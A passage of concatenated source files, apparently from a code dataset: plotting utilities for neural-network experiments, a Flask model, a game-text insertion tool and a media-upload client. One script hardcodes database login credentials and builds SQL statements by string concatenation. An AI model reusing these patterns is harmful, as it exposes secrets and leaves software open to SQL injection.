accuracy\")\n axes[0].set_xlabel(\"Activation function parameter value\")\n axes[1].set_xlabel(\"Mixed cases\")\n axes[0].set_ylabel(\"Final validation accuracy\")\n axes[1].xaxis.set_ticks([])\n\n # shrink second axis by 20%\n box = axes[1].get_position()\n axes[1].set_position([box.x0, box.y0, box.width * 0.8, box.height])\n\n # append legend to second axis\n axes[1].legend(handles, labels, loc='center left', bbox_to_anchor=(1, 0.5))\n \n # optional saving\n if not self.save_fig:\n print(\"Not saving.\")\n plt.show()\n return\n\n sub_dir = ensure_sub_dir(self.data_dir, f\"figures/{net_name}/final accuracy/\")\n cases = \" & \".join(mixed_cases)\n filename = f\"{cases} final acc.png\"\n filename = os.path.join(sub_dir, filename)\n print(f\"Saving... 
{filename}\")\n plt.savefig(filename, dpi=300) \n\n def plot_accuracy(self, dataset, net_name, schemes, cases):\n \"\"\"\n Plots accuracy over training for different experimental cases.\n\n Args:\n dataset\n net_name\n schemes\n cases (list): Experimental cases to include in figure.\n\n Returns:\n None.\n\n \"\"\"\n # pull data\n acc_df = self.stats_processor.load_accuracy_df(dataset, net_name, \n cases, schemes)\n\n # group and compute stats\n acc_df.set_index([\"train_scheme\", \"case\", \"epoch\"], inplace=True)\n acc_df_groups = acc_df.groupby([\"train_scheme\", \"case\", \"epoch\"])\n acc_df_stats = acc_df_groups.agg({ \"acc\": [np.mean, np.std] })\n acc_df_stats_groups = acc_df_stats.groupby([\"train_scheme\", \"case\"])\n \n # plot\n fig, ax = plt.subplots(figsize=(14,8))\n clrs = sns.color_palette(\"hls\", len(acc_df_stats_groups.groups))\n \n for group, clr in zip(acc_df_stats_groups.groups, clrs):\n\n scheme, case = group\n group_data = acc_df_stats_groups.get_group((scheme, case))\n\n # error bars = 2 standard devs\n yvals = group_data[\"acc\"][\"mean\"].values\n yerr = group_data[\"acc\"][\"std\"].values * 2\n ax.plot(range(len(yvals)), yvals, label=f\"{scheme} {case}\", c=clr)\n ax.fill_between(range(len(yvals)), yvals - yerr, yvals + yerr,\n alpha=0.1, facecolor=clr)\n \n ax.set_title(\"Classification accuracy during training\")\n ax.set_xlabel(\"Epoch\")\n ax.set_ylabel(\"Validation accuracy\")\n ax.legend()\n step = 5\n ax.set_xticks([i * step for i in range(int((len(yvals) + 1)/step))])\n \n # optional saving\n if not self.save_fig:\n print(\"Not saving.\")\n plt.show()\n return\n \n sub_dir = ensure_sub_dir(self.data_dir, f\"figures/{dataset}/{net_name}/accuracy/\")\n case_names = \" & \".join(cases)\n filename = f\"{case_names} accuracy.png\"\n filename = os.path.join(sub_dir, filename)\n print(f\"Saving... {filename}\")\n plt.savefig(filename, dpi=300) \n \n def plot_type_specific_weights(self, net_name, case):\n \"\"\"\n Plots mean absolute weights for each cell type across layers \n \"\"\"\n\n # pull data\n df = self.stats_processor.load_weight_df(net_name, case)\n\n # plot\n state_keys = list(nets[net_name][\"state_keys\"].keys())\n x = np.array([i * 1.25 for i in range(len(state_keys))])\n n_act_fns = len(df.index.levels[1])\n width = 1.0 / n_act_fns\n err_kw = dict(lw=1, capsize=3, capthick=1)\n\n fig, ax = plt.subplots(figsize=(14,8))\n clrs = sns.color_palette(\"hls\", n_act_fns)\n\n for i in range(n_act_fns):\n\n act_fn = df.index.levels[1][i]\n\n yvals = df[\"avg_weight\"][:, act_fn][state_keys]\n yerr = df[\"sem_weight\"][:, act_fn][state_keys]\n\n ax.bar(x, yvals, width, yerr=yerr, label=act_fn, error_kw=err_kw, \n color=clrs[i])\n\n # update bar locations for next group\n x = [loc + width for loc in x]\n\n ax.set_title(\"Weight distribution across layers after training\")\n ax.set_xlabel(\"Layer\")\n ax.set_ylabel(\"Mean abs weight per layer\")\n ax.legend()\n\n loc = (n_act_fns - 1) / (2. * n_act_fns)\n ax.set_xticks([loc + i * 1.25 for i in range(len(state_keys))])\n labels = list(nets[net_name][\"state_keys\"].values())\n ax.set_xticklabels(labels)\n\n # optional saving\n if not self.save_fig:\n print(\"Not saving.\")\n plt.show()\n return\n\n sub_dir = ensure_sub_dir(self.data_dir, f\"figures/{net_name}/weight distr/\")\n filename = f\"{case} weight distr.png\"\n filename = os.path.join(sub_dir, filename)\n print(f\"Saving... 
{filename}\")\n plt.savefig(filename, dpi=300) \n\n\n def plot_weight_changes(self, net_name, cases, train_schemes):\n \"\"\"\n Plots average change in weights over training for the given\n experimental cases.\n\n Args:\n cases (list): Experimental cases to include in figure.\n\n Returns:\n None.\n\n \"\"\"\n # pull data\n df = self.stats_processor.load_weight_change_df(net_name, cases, train_schemes)\n\n state_keys = df.columns.to_list()\n sem_cols = list(filter(lambda x: x.endswith(\".sem\"), df.columns))\n df_groups = df.groupby([\"train_scheme\", \"case\"])\n\n # plot\n x = np.array([i * 1.25 for i in range(len(state_keys))])\n width = 1.0 / len(cases)\n err_kw = dict(lw=1, capsize=3, capthick=1)\n\n fig, ax = plt.subplots(figsize=(14,8))\n clrs = sns.color_palette(\"hls\", len(cases))\n\n for i in range(len(cases)):\n\n case = cases[i]\n group = df_groups.get_group(case)\n yvals = group[state_keys].values[0]\n yerr = group[sem_cols].values[0]\n\n ax.bar(x, yvals, width, yerr=yerr, label=case, error_kw=err_kw, \n color=clrs[i])\n\n # update bar locations for next group\n x = [loc + width for loc in x]\n\n ax.set_title(\"Weight changes by layer during training\")\n ax.set_xlabel(\"Layer\")\n ax.set_ylabel(\"Mean abs weight change per layer\")\n ax.legend()\n\n loc = (len(cases) - 1) / (2. * len(cases))\n ax.set_xticks([loc + i * 1.25 for i in range(len(state_keys))])\n labels = [k[:-7] for k in df.columns if k.endswith(\".weight\")]\n ax.set_xticklabels(labels)\n\n # optional saving\n if not self.save_fig:\n print(\"Not saving.\")\n plt.show()\n return\n\n sub_dir = ensure_sub_dir(self.data_dir, f\"figures/{net_name}/weight change/\")\n cases = \" & \".join(cases)\n filename = f\"{cases} weight.png\"\n filename = os.path.join(sub_dir, filename)\n print(f\"Saving... 
{filename}\")\n plt.savefig(filename, dpi=300)\n \n\nif __name__==\"__main__\":\n \n visualizer = Visualizer(\"/home/briardoty/Source/allen-inst-cell-types/data_mountpoint\", \n 10, save_fig=False, refresh=False)\n \n # visualizer.plot_type_specific_weights(\"swish10-tanhe1-relu\")\n\n # visualizer.plot_final_accuracy([\"swish_0.5\", \"swish_1\", \"swish_3\", \"swish_5\", \"swish_10\"], [\"swish_1-3\", \"swish_5-10\"])\n\n # visualizer.plot_weight_changes([\"unmodified\"], [\"adam\"])\n \n # visualizer.plot_accuracy(\"cifar10\", \"vgg11\", [\"adam\"], [\"control\", \"swish10\", \"tanhe1\", \"swish10-tanhe1\"])\n \n visualizer.scatter_final_acc(\"imagenette2\", \n [\"vgg11\", \"sticknet8\"], \n [\"adam\", \"sgd\"], \n [\"swish\", \"tanhe\"])\n\n # visualizer.plot_activation_fns([Sigfreud(1), Sigfreud(1.5), Sigfreud(2.), Sigfreud(4.)])\n # visualizer.plot_activation_fns([Swish(3), Swish(5), Swish(10)])\n # visualizer.plot_activation_fns([Tanhe(0.1), Tanhe(0.5), Tanhe(1), Tanhe(10)])\n # visualizer.plot_activation_fns([Renlu(0.5), Renlu(1), Renlu(1.5)])\n","sub_path":"modules/Visualizer.py","file_name":"Visualizer.py","file_ext":"py","file_size_in_byte":15776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177828758","text":"\n# Inherent Properties\n# Link https://support.logitech.com/en_us/product/hd-pro-webcam-c910/specs\nCAM_NAME = 'logitech C910'\nCAM_RESOLUTION = [640,480] # pixel\nCAM_RATIO = [4,3]\nCAM_DIAGONAL_FOV = 83.0 #degrees\n\n# Dependent on physical set up\nCAM_DISTANCE_TO_SURFACE = 3.0 # meters\nCAM_ANGLE_TO_SURFACE = 90.0 #degrees\n\n# EVALUATING THE DISTANCE PER PIXEL\nimport math\nimport numpy as np\n\ndiagDist = CAM_DISTANCE_TO_SURFACE * math.tan(math.radians(CAM_DIAGONAL_FOV/2))\nwidthRatio = CAM_RATIO[0]/np.linalg.norm(CAM_RATIO)\nheightRatio = CAM_RATIO[1]/np.linalg.norm(CAM_RATIO)\n# conversion of pixel to metric\nCAM_PIXELS_TO_X = diagDist * widthRatio/CAM_RESOLUTION[0]\nCAM_PIXELS_TO_Y = diagDist * heightRatio/CAM_RESOLUTION[1]\n# clear not used values\ndel diagDist,widthRatio,heightRatio\n","sub_path":"src/vision/src/CamConfig_logitechC910.py","file_name":"CamConfig_logitechC910.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"95127335","text":"from flask_app.config.mysqlconnection import connectToMySQL\n\nclass Message:\n def __init__( self , data ):\n self.user_id = data['user_id']\n self.message = data['message']\n self.receiver_id = data['receiver_id']\n\n @classmethod\n def save_message( cls , data ):\n query = \"INSERT INTO messages ( user_id, receiver_id, message ) VALUES (%(user_id)s,%(receiver_id)s, %(message)s);\"\n return connectToMySQL('users').query_db( query, data)\n\n @classmethod\n def get_all_messages(cls, data):\n query = \"SELECT * FROM users.messages WHERE receiver_id = %(user_id)s;\"\n results = connectToMySQL('users').query_db(query, data)\n messages = []\n for message in results:\n messages.append( cls(message) )\n return messages\n\n \n @classmethod\n def get_from_author(cls, data:dict):\n query = \"SELECT * FROM users JOIN messages ON users.id = messages.user_id JOIN users ON messages.id = messages.receiver_id WHERE receiver_id = %(receiver_id)s;\"\n results = connectToMySQL('users').query_db(query, data)\n messages = []\n for message in results:\n messages.append(cls(message))\n print (messages)\n return messages\n\n\n # @classmethod\n # def get_byid(cls, data:dict):\n # query = 
\"SELECT * FROM authors JOIN favorite ON authors.id = favorite.author_id JOIN books ON books.id = favorite.book_id WHERE author_id = %(author_id)s;\"\n # results = connectToMySQL('authorsbooks').query_db(query, data)\n # favorites = []\n # for favorite in results:\n # favorites.append(cls(favorite))\n # return favorites\n\n\n @classmethod\n def delete_byid(cls, data):\n query = \"DELETE FROM favorite WHERE book_id = %(book_id)s AND author_id = %(author_id)s;\"\n return connectToMySQL('authorsbooks').query_db(query, data)\n\n # @classmethod\n # def save(cls, data ):\n # query = \"INSERT INTO favorite ( name, created_at , updated_at) VALUES ( %(name)s, NOW() , NOW() );\"\n # return connectToMySQL('authorsbooks').query_db( query, data )\n\n # @classmethod\n # def update(cls, data ):\n # query = \"UPDATE authors SET( name ) VALUES ( %(name)s , NOW() , NOW() ) WHERE id = %(id)s;\"\n # return connectToMySQL('authorsbooks').query_db( query, data ) ","sub_path":"flask_app/models/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"632768681","text":"\"\"\"\nPlot planes from joint analysis files.\n\nUsage:\n plot_slices.py EXP_NAME ... [--output=]\n\nOptions:\n EXP_NAME # Name of experiment to add switchboard module path\n --output= # Output directory [default: ./outputs]\n\n\"\"\"\n\nimport h5py\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nplt.ioff()\nfrom dedalus.extras import plot_tools\n# Import modified version of plot bot\nfrom plot_tools_mod import plot_bot_3d_mod\n\n###############################################################################\n# Helper functions\n\ndef build_vp_dicts():\n bp_dict = {'vp_name': \"Background Profile\",\n 'vp_task': 'bp',\n 'vp_xlabel':r'$N$ (s$^{-1}$)'}\n sl_dict = {'vp_name': \"Sponge Layer\",\n 'vp_task': 'sl',\n 'vp_xlabel':r'$C_\\nu$'}\n rf_dict = {'vp_name': \"Rayleigh Friction\",\n 'vp_task': 'rf',\n 'vp_xlabel':r'$C_{rf}$ (s$^{-1}$)'}\n return bp_dict, sl_dict, rf_dict\n\n# Sets parameters according to the switchboard settings\ndef flip_the_switches(plot_all_variables, plot_sl_profile, plot_rf_profile, use_sponge, use_sst, T):\n bp_dict, sl_dict, rf_dict = build_vp_dicts()\n if plot_all_variables:\n tasks = ['b', 'p', 'u', 'w']\n nrows, ncols = 2, 2\n l_vp = None\n r_vp = None\n else:\n tasks = ['w']\n l_vp = bp_dict\n nrows, ncols = 1, 3\n if use_sponge and plot_sl_profile:\n r_vp = sl_dict\n else:\n if plot_rf_profile:\n r_vp = rf_dict\n else:\n nrows, ncols = 1, 2\n r_vp = rf_dict\n if use_sst: # Stop Simulation Time, opposed to Stop Simulation Period\n title_str = r'{:}, $t$ = {:2.3f}'\n time_factor = 1.0\n else:\n title_str = r'{:}, $t/T$ = {:2.3f}'\n time_factor = T\n return tasks, nrows, ncols, title_str, time_factor, l_vp, r_vp\n\n# Adds the title to a frame\ndef add_frame_title(fig, file, index, title_func):\n title = title_func(file['scales/sim_time'][index])\n fig.suptitle(title, fontsize='large')\n\n# Saves figure as a frame\ndef save_fig_as_frame(fig, file, index, savename_func, output, dpi):\n savename = savename_func(file['scales/write_number'][index])\n savepath = output.joinpath(savename)\n fig.savefig(str(savepath), dpi=dpi)\n fig.clear()\n\n# Plots one frame of one task (b, p, u, or w)\ndef plot_one_task(n, ncols, mfig, file, task, index, x_lims, y_lims, n_clrbar_ticks, abs_line):\n # Build subfigure axes\n i, j = divmod(n, ncols)\n axes = 
mfig.add_axes(i, j, [0, 0, 1, 1])\n # Call 3D plotting helper, slicing in time\n dset = file['tasks'][task]\n # title is usually equal to `task`\n plot_bot_3d_mod(dset, 0, index, x_limits=x_lims, y_limits=y_lims, n_cb_ticks=n_clrbar_ticks, clim=[-1.3E-3,1.3E-3], axes=axes, title=r'Vertical Velocity $(m/s)$', even_scale=True, abs_div=abs_line)\n #plot_bot_3d_mod(dset, 0, index, x_limits=x_lims, y_limits=y_lims, n_cb_ticks=n_clrbar_ticks, axes=axes, title=task, even_scale=True, abs_div=abs_line)\n\n# Extracts relevant arrays from a vertical profile snapshot\ndef extract_vp_snapshot(task_name, snap_dir, vp_snaps):\n vp_snap_filepath = snap_dir + '/' + vp_snaps + '/' + vp_snaps + '_s1.h5'\n with h5py.File(vp_snap_filepath, mode='r') as file:\n data = file['tasks'][task_name]\n temp = data[()]\n hori = temp[0][0]\n z_ = file['scales']['z']['1.0']\n vert = z_[()]\n return hori, vert\n\ndef add_vp_buffers(ax, buffer, extra_buffer, ylims=None):\n xvals,yvals = ax.get_xlim(), ax.get_ylim()\n xrange = xvals[1]-xvals[0]\n # Check if it's a constant vertical profile\n if xrange==0:\n xleft = xvals[0] - extra_buffer\n xright = xvals[1] + extra_buffer\n else:\n xleft = xvals[0] - buffer\n xright = xvals[1] + buffer\n ax.set_xlim(xleft, xright)\n if ylims is None:\n yrange = yvals[1]-yvals[0]\n ytop = yvals[1] + buffer\n ybott = yvals[0]\n else:\n ytop = ylims[1] + buffer\n ybott = ylims[0]\n ax.set_ylim(ybott, ytop)\n\n# Set a fixed aspect ratio on matplotlib plots regardless of axis units\ndef fixed_aspect_ratio(ax, ratio, ylims=None):\n # Does not work for twin axes plots\n xvals,yvals = ax.get_xlim(), ax.get_ylim()\n xrange = xvals[1]-xvals[0]\n if ylims is None:\n yrange = yvals[1]-yvals[0]\n else:\n yrange = ylims[1]-ylims[0]\n ax.set_aspect(ratio*(xrange/yrange), adjustable='box')\n\n# Set a fixed aspect ratio on matplotlib plots regardless of axis units\ndef fixed_aspect_ratio2(ax, ratio, ylims=None):\n # Does not work for twin axes plots\n xvals,yvals = ax.get_xlim(), ax.get_ylim()\n xrange = xvals[1]-xvals[0]\n if ylims is None:\n yrange = yvals[1]-yvals[0]\n else:\n yrange = ylims[1]-ylims[0]\n aspect_ratio = ratio*(xrange/yrange)\n ax.set_aspect(aspect_ratio, adjustable='datalim')\n\ndef make_twin_plot(axes0, hori, vert, buffer, extra_buffer, ylims, dis_ratio, abs_line, rhori=None, rvert=None, twin=False):\n axes0.plot(hori, vert, 'k-')\n # Add buffers around the edge to make plot look nice\n add_vp_buffers(axes0, buffer, extra_buffer, ylims)\n if twin:\n axes1 = axes0.twiny()\n axes1.plot(rhori, rvert, 'g-')\n axes1.tick_params(axis='x', colors='g')\n # Add buffers around the edge to make plot look nice\n add_vp_buffers(axes1, buffer, extra_buffer, ylims)\n # Force display aspect ratio\n fixed_aspect_ratio2(axes0, dis_ratio, ylims)\n fixed_aspect_ratio2(axes1, dis_ratio, ylims)\n else:\n # Force display aspect ratio\n fixed_aspect_ratio(axes0, dis_ratio, ylims)\n # Add horizontal line to divide absorption layer\n axes0.axhline(y=abs_line, color='gray', ls='--')\n return axes0\n\ndef make_vp_plot(axes0, hori, vert, buffer, extra_buffer, ylims, dis_ratio, abs_line, rhori=None, rvert=None, twin=False):\n axes0.plot(hori, vert, 'k-')\n if twin:\n axes0.plot(rhori, rvert, 'g-')\n # Add buffers around the edge to make plot look nice\n add_vp_buffers(axes0, buffer, extra_buffer, ylims)\n # Force display aspect ratio\n fixed_aspect_ratio(axes0, dis_ratio, ylims)\n # Add horizontal line to divide absorption layer\n axes0.axhline(y=abs_line, color='gray', ls='--')\n return axes0\n
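\n# A quick sanity check of the aspect math above: with ratio=1, an x-range of 4\n# and a y-range of 2, set_aspect receives 2.0, i.e. each y data-unit is drawn\n# twice as large as an x data-unit, so the axes box renders square.\n\n# Adds vertical profile 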
plot to the left of animation\ndef plot_vp_on_left(l_vp, r_vp, snap_dir, vp_snaps, mfig, buffer, extra_buffer, dis_ratio, abs_line, ylims=None, twin=False):\n axes0 = mfig.add_axes(0, 0, [0, 0, 1.3, 1])#, sharey=axes1)\n axes0.set_title(l_vp['vp_name'])\n axes0.set_xlabel(l_vp['vp_xlabel'])\n axes0.set_ylabel(r'$z$ (m)')\n # Get arrays of background profile values\n lhori, lvert = extract_vp_snapshot(l_vp['vp_task'], snap_dir, vp_snaps)\n # Get arrays of background profile values\n rhori, rvert = extract_vp_snapshot(r_vp['vp_task'], snap_dir, vp_snaps)\n make_twin_plot(axes0, lhori, lvert, buffer, extra_buffer, ylims, dis_ratio, abs_line, rhori, rvert, twin)\n #make_vp_plot(axes0, hori, vert, buffer, extra_buffer, ylims, dis_ratio, abs_line)\n return axes0\n\n# Adds vertical profile plot to the right of animation\ndef plot_vp_on_right(r_vp, snap_dir, vp_snaps, mfig, buffer, extra_buffer, dis_ratio, abs_line, ylims=None):\n axes0 = mfig.add_axes(0, 2, [0, 0, 1.3, 1])\n axes0.set_title(r_vp['vp_name'])\n axes0.set_xlabel(r_vp['vp_xlabel'])\n axes0.set_ylabel(r'$z$ (m)')\n # Get arrays of background profile values\n hori, vert = extract_vp_snapshot(r_vp['vp_task'], snap_dir, vp_snaps)\n make_vp_plot(axes0, hori, vert, buffer, extra_buffer, ylims, dis_ratio, abs_line)\n return axes0\n\n###############################################################################\n###############################################################################\n\ndef main(filename, start, count, output):\n \"\"\"Save plot of specified tasks for given range of analysis writes.\"\"\"\n\n # To import the switchboard\n import sys\n switch_path = \"../\" + NAME\n sys.path.insert(0, switch_path) # Adds higher directory to python modules path\n import switchboard as sbp\n\n # Get relevant parameters from switchboard used in loop\n plot_all = sbp.plot_all_variables\n n_clrbar_ticks = sbp.n_clrbar_ticks\n # Display parameters\n x_f = sbp.x_0 + sbp.L_x_dis\n z_b = sbp.z_0 - sbp.L_z_dis\n\n # Calculate aspect ratio\n AR = sbp.L_x_dis / sbp.L_z_dis\n # Set tuples for display boundaries\n x_lims = [sbp.x_0, x_f]\n y_lims = [z_b, sbp.z_0]\n\n # Change the size of the text overall\n font = {'size' : sbp.font_size}\n plt.rc('font', **font)\n # Set parameters based on switches\n tasks, nrows, ncols, title_str, time_factor, l_vp, r_vp = flip_the_switches(plot_all, sbp.plot_sponge, sbp.plot_rf, sbp.use_sponge, sbp.use_stop_sim_time, sbp.T)\n # Plot settings\n scale = sbp.scale\n dpi = sbp.dpi\n title_func = lambda sim_time: title_str.format('',sim_time/time_factor)\n #title_func = lambda sim_time: title_str.format(NAME, sim_time/time_factor)\n savename_func = lambda write: 'write_{:06}.png'.format(write)\n # Layout\n image = plot_tools.Box(AR, 1)\n pad = plot_tools.Frame(0.2, 0.2, 0.15, 0.15)\n margin = plot_tools.Frame(0.3, 0.2, 0.1, 0.1)\n\n # Create multifigure\n mfig = plot_tools.MultiFigure(nrows, ncols, image, pad, margin, scale)\n fig = mfig.figure\n # Plot writes\n with h5py.File(filename, mode='r') as file:\n for index in range(start, start+count):\n for n, task in enumerate(tasks):\n if (plot_all == False):\n # Plot stratification profile on the left\n ax0 = plot_vp_on_left(l_vp, r_vp, output_dir+'/'+sbp.snapshots_dir, sbp.vp_snap_dir, mfig, sbp.buffer, sbp.extra_buffer, sbp.vp_dis_ratio, sbp.abs_div, y_lims, sbp.plot_twin)\n if r_vp!=None:\n ax1 = plot_vp_on_right(r_vp, output_dir+'/'+sbp.snapshots_dir, sbp.vp_snap_dir, mfig, sbp.buffer, sbp.extra_buffer, sbp.vp_dis_ratio, sbp.abs_div, y_lims)\n # shift n so that 
animation is on the right side\n n = 1\n plot_one_task(n, ncols, mfig, file, task, index, x_lims, y_lims, n_clrbar_ticks, sbp.abs_div)\n # Add title to frame\n add_frame_title(fig, file, index, title_func)\n # Save figure\n save_fig_as_frame(fig, file, index, savename_func, output, dpi)\n plt.close(fig)\n\n###############################################################################\nif __name__ == \"__main__\":\n\n import pathlib\n from docopt import docopt\n from dedalus.tools import logging\n from dedalus.tools import post\n from dedalus.tools.parallel import Sync\n\n args = docopt(__doc__)\n\n NAME = str(args['EXP_NAME'])\n\n output_dir = str(args['--output'])\n output_path = pathlib.Path(output_dir + '/frames').absolute()\n # Create output directory if needed\n with Sync() as sync:\n if sync.comm.rank == 0:\n if not output_path.exists():\n output_path.mkdir()\n post.visit_writes(args['<files>'], main, output=output_path)\n","sub_path":"_modules_other/plot_slices.py","file_name":"plot_slices.py","file_ext":"py","file_size_in_byte":11280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"513319291","text":"#!/usr/bin/env python3\n\ndef bitShift(ary):\n shiftVal = 3\n intAry = []\n rtnString = ''\n\n for x in ary:\n intAry.append(ord(x))\n\n for y in intAry:\n newString = str(y << shiftVal)\n rtnString += newString\n\n return rtnString\n\ndef hash(plainString):\n # hashed = plainString\n n = len(plainString)//4\n c = plainString[n*2:n*3]\n shiftC = bitShift(c)\n # hashed = A + B + shiftC + D\n hashed = shiftC\n return hashed\n\ndef main():\n \"\"\" Main entry point of the app \"\"\"\n print(\"hello world\")\n inputStr = input(\"Enter string to be hashed: \")\n n = len(inputStr)//4\n a = inputStr[0:n]\n b = inputStr[n:n*2]\n c = inputStr[n*2:n*3]\n d = inputStr[n*3:len(inputStr)]\n print(a)\n print(b)\n print(c)\n print(d)\n if len(a) == 0 or len(b) == 0 or len(c) == 0 or len(d) == 0:\n raise Exception('Error string not long enough')\n print(f'Hashed string: {hash(inputStr)}')\n\n\nif __name__ == \"__main__\":\n \"\"\" This is executed when run from the command line \"\"\"\n main()\n","sub_path":"assn.py","file_name":"assn.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"314072646","text":"import mysql.connector as connector\r\nimport CitationRetrieval\r\n\r\nfrom datetime import datetime\r\ncurrDate = datetime.now().strftime('%B')+\"_\"+str(datetime.now().year)\r\n\r\ndatabase = connector.connect(host='citations.clqyzvodepst.us-east-1.rds.amazonaws.com',database='citations',user='admin',password='adminroot')\r\ncursor=database.cursor()\r\n\r\ncursor.execute('select orcid from report')\r\nids=cursor.fetchall()\r\norcids=[]\r\nfor i in ids:\r\n orcids.append(i[0])\r\n\r\ncursor.execute('desc report')\r\nret=cursor.fetchall()\r\navail=[]\r\nfor i in ret:\r\n avail.append(i[0])\r\n\r\n
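# NOTE: building SQL by string concatenation is injection-prone; mysql.connector\r\n# supports parameterized values, e.g.\r\n# cursor.execute('update report set '+currDate+' = %s where orcid = %s',\r\n# (str(CitationRetrieval.citeCount(i)), i))\r\n# (column names such as currDate still need separate validation).\r\nif currDate not in avail:\r\n cursor.execute('alter table report add column '+currDate+' VARCHAR(45)')\r\n for i in orcids:\r\n cursor.execute('update report set '+currDate+' = \''+str(CitationRetrieval.citeCount(i))+'\' where orcid = \''+i+'\'')\r\nelse:\r\n for i in orcids:\r\n cursor.execute('update report set '+currDate+' = \''+str(CitationRetrieval.citeCount(i))+'\' where orcid = 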
\\''+i+'\\'')","sub_path":"accessFromDBhost.py","file_name":"accessFromDBhost.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"307196038","text":"# -*- coding:utf-8 -*-\n\"\"\"\n------------------- Runepack (룬팩) 2, 3, 4 data structure\nThe file starts with a header. Reading little-endian in 4-byte units:\n[magic stamp TEXT] [total dialogue-line count] [line length] [line start offset]\n[line length] [line start offset][line length] [line start offset]\n[line length] [line start offset][line length] [line start offset]\n[line length] [line start offset][line length] [line start offset]\n...\nand so on, repeating.\n\nCaution!!!\nIn extracted text, \\n is the \"newline\" control character, code \"0A\";\nyou will have to replace it when re-inserting.\n\"\"\"\n\nimport time\nimport sys\nimport binascii\nimport struct\nimport os\n\ntablefile = \"수정UTF_수정_실전_대사삽입용.tbl\"\nNULLBYTES = \"0000\"\nTBLhex = []\nTBLword = []\nWriteHexArr = []\nWriteOffsetArr = []\nWriteLengthArr = []\n\n\ndef readTBL(TBL):\n global TBLword\n global TBLhex\n file = open(TBL, \"r\", encoding='utf-8')\n lines = file.readlines()\n for line in lines:\n if line == \"\":\n continue\n if line.count(\"=\") == 2:\n line = line.split(\"=\")\n TBLword.append(\"=\")\n TBLhex.append(line[0])\n else:\n line = line.replace(\"\\n\", \"\")\n line = line.replace(u\"\\ufeff\", '') # work around a BOM-specific quirk\n line = line.split(\"=\")\n\n if line == ['']:\n continue\n TBLword.append(line[1])\n TBLhex.append(line[0])\n print(TBLword)\n print(TBLhex)\n return\n\n\ndef string_hex_to_hex(str, dst):\n for i in range(0, int(len(str) / 2)):\n outtemp = int(str[i * 2:i * 2 + 2], 16)\n outtemp2 = struct.pack(\"B\", outtemp)\n dst.write(outtemp2)\n\n\nreadfile = sys.argv[1]\ntry:\n writefile = sys.argv[2]\nexcept IndexError:\n writefile = readfile\n writefile += \".out\"\nreadTBL(tablefile)\n\ninFp = open(readfile, \"r\", encoding=\"utf-8\")\noutFp = open(writefile, \"wb\")\n\nlineIndex = (inFp.readline())\nprint(lineIndex)\nlineIndex = int(lineIndex.replace(u\"\\ufeff\", ''))\nfor i in range(0, lineIndex):\n print(\"%d of %d\"%(i+1,lineIndex))\n WriteHex = \"\"\n line = inFp.readline().replace(\"\\\\n\", \"&\").replace(\"\\n\", \"\")\n print(line)\n for j in range(0, len(line)):\n try:\n Temp = TBLword.index(line[j])\n WriteHex += TBLhex[Temp]\n except:\n raise\n WriteHex += (NULLBYTES)\n WriteHexArr.append(WriteHex)\n if i == 0:\n WriteOffsetArr.append(0x08 + (lineIndex * 0x08))\n # Different Types\n else:\n if NULLBYTES == \"0000\":\n WriteOffsetArr.append(WriteOffsetArr[i - 1] + WriteLengthArr[i - 1] + 2)\n else:\n WriteOffsetArr.append(WriteOffsetArr[i - 1] + WriteLengthArr[i - 1] + 1)\n if NULLBYTES == \"0000\":\n WriteLengthArr.append((len(WriteHex) // 2) - 2)\n else:\n WriteLengthArr.append((len(WriteHex) // 2) - 1)\n
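# Write the header described in the module docstring: 4-byte magic \"TEXT\",\n# the total line count, then one (length, offset) pair per line -- all 4-byte\n# little-endian ints, so the header takes 8 + 8*lineIndex bytes (matching the\n# 0x08-based offsets computed above).\noutFp.write(\"TEXT\".encode('ascii'))\noutFp.write(struct.pack(\"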
see info() docs\n \"\"\"\n return json.loads(urllib.request.urlopen(API_URL + \"info?list=\" + \",\".join(hashlist)).read())\n\ndef exists(hash):\n \"\"\"\n Returns boolean\n \"\"\"\n return json.loads(urllib.request.urlopen(API_URL + hash + \"/exists\").read())[\"exists\"]\n\ndef delete(hash):\n \"\"\"\n Returns dict:\n Either\n * status: string, always \"success\", meaning: The IP matches the stored hash and the file was deleted.\n or\n * error: integer, error code.\n 401 = The IP does not match the stored hash.\n 404 = There is no file with that hash.\n \"\"\"\n try:\n return json.loads(urllib.request.urlopen(API_URL + hash + \"/delete\").read())[\"status\"]\n except urllib.error.HTTPError as e:\n return json.loads(e.read())\n\ndef status(hash):\n \"\"\"\n Returns dict:\n Either\n * status: string, one of four values:\n \"done\": The file has been processed.\n \"processing\": The file is being processed or in the processing queue.\n \"error\": The processing step finished early with an abnormal return code.\n \"timeout\": The file took too long to process.\n or\n * error: integer, error code.\n 404 = There is no file with that hash.\n \"\"\"\n try:\n return json.loads(urllib.request.urlopen(API_URL + hash + \"/status\").read())\n except urllib.error.HTTPError as e:\n return json.loads(e.read())\n\ndef upload(address, url=True, geturl=False):\n \"\"\"\n Returns dict:\n Either\n * hash: string, resulting image hash\n or\n * error: integer, error code\n 409 = The file was already uploaded.\n 420 = The rate limit was exceeded. Enhance your calm.\n 415 = The file extension is not acceptable.\n * hash: string, resulting image hash, if error code is 409\n \"\"\"\n if url:\n try:\n data = json.loads(urllib.request.urlopen(API_URL + \"upload/url\", urllib.parse.urlencode({'url': address})).read())\n if geturl:\n return BASE_URL + data[\"hash\"]\n else:\n return data\n except urllib.error.HTTPError as e:\n return json.loads(e.read())\n else:\n import MultipartPostHandler\n opener = urllib.request.build_opener(MultipartPostHandler.MultipartPostHandler)\n try:\n data = json.loads(opener.open(API_URL + \"upload/file\", {'file': open(address, \"rb\")}).read())\n if geturl:\n return BASE_URL + data[\"hash\"]\n else:\n return data\n except urllib.error.HTTPError as e:\n return json.loads(e.read())\n\nif __name__ == \"__main__\":\n from sys import argv\n if len(argv) > 2:\n if 